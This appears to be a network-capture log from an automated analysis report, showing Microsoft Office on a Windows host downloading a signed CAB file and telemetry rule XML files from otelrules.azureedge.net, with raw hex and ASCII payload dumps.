                                                                                                                                                                                            MS-RequestId: a2b76cb0-4269-474f-a479-26fe3a63a5fd
                                                                                                                                                                                            MS-CV: nPMqPFvy1kmnTQaa.0
                                                                                                                                                                                            X-Microsoft-SLSClientCache: 1440
                                                                                                                                                                                            Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:04:59 GMT
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Content-Length: 30005
                                                                                                                                                                                            2024-11-20 20:05:00 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                                                                                                                                                            Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                                                                                                                                                            2024-11-20 20:05:00 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                                                                                                                                                            Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            16192.168.2.44981113.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:00 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:01 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:01 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 450
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                                                                                                                                                            ETag: "0x8DC582BD4C869AE"
                                                                                                                                                                                            x-ms-request-id: 05856cf7-f01e-0020-4060-3b956b000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200501Z-178bfbc474blv55whC1NYCpz4800000000h000000000mm0d
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:01 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            17192.168.2.44981413.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:00 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:01 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:01 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 408
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                            ETag: "0x8DC582BB56D3AFB"
                                                                                                                                                                                            x-ms-request-id: e579fe48-a01e-001e-648c-3a49ef000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200501Z-1777c6cb754whff4hC1TEBcd6c00000008n000000000qsyc
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:01 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            18192.168.2.44981213.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:00 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:01 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:01 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 2980
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                                            ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                                            x-ms-request-id: 1aa7a34d-201e-0096-3676-3bace6000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200501Z-178bfbc474bnwsh4hC1NYC2ubs00000000e0000000005cdg
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:01 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            19192.168.2.44981313.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:00 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:01 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:01 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 2160
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                            ETag: "0x8DC582BA3B95D81"
                                                                                                                                                                                            x-ms-request-id: 7268c357-001e-0066-5863-3b561e000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200501Z-178bfbc474blv55whC1NYCpz4800000000mg00000000hhrz
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:01 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            20192.168.2.44981013.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:00 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:01 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:01 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 3788
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                                            ETag: "0x8DC582BAC2126A6"
                                                                                                                                                                                            x-ms-request-id: 1c744767-001e-0082-6060-3b5880000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200501Z-178bfbc474bnwsh4hC1NYC2ubs00000000n0000000000dq3
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:01 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            21192.168.2.44981713.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:03 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:03 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:03 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 471
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                                                                                                                                                            ETag: "0x8DC582BB10C598B"
                                                                                                                                                                                            x-ms-request-id: 17c3c293-501e-00a3-6567-3bc0f2000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200503Z-178bfbc474bwh9gmhC1NYCy3rs00000000fg000000005n59
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:03 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            22192.168.2.44981613.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:03 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:03 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:03 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 415
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                                                                                                                                                            ETag: "0x8DC582B9F6F3512"
                                                                                                                                                                                            x-ms-request-id: bfe6cc7a-201e-006e-7e8c-3abbe3000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200503Z-r1d97b995777mdbwhC1TEBezag00000009d0000000000r10
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:03 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            23192.168.2.44981813.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:03 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:03 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:03 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 632
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                            ETag: "0x8DC582BB6E3779E"
                                                                                                                                                                                            x-ms-request-id: 70a275ef-201e-0051-048c-3a7340000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200503Z-185f5d8b95cwtv72hC1NYC141w0000000ag0000000018q40
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:03 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            24192.168.2.44981513.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:03 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:03 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:03 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 474
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                                                                                                                                                            ETag: "0x8DC582B9964B277"
                                                                                                                                                                                            x-ms-request-id: 02a2c6fa-b01e-0001-107b-3b46e2000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200503Z-185f5d8b95cdtclvhC1NYC4rmc0000000atg00000000weus
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
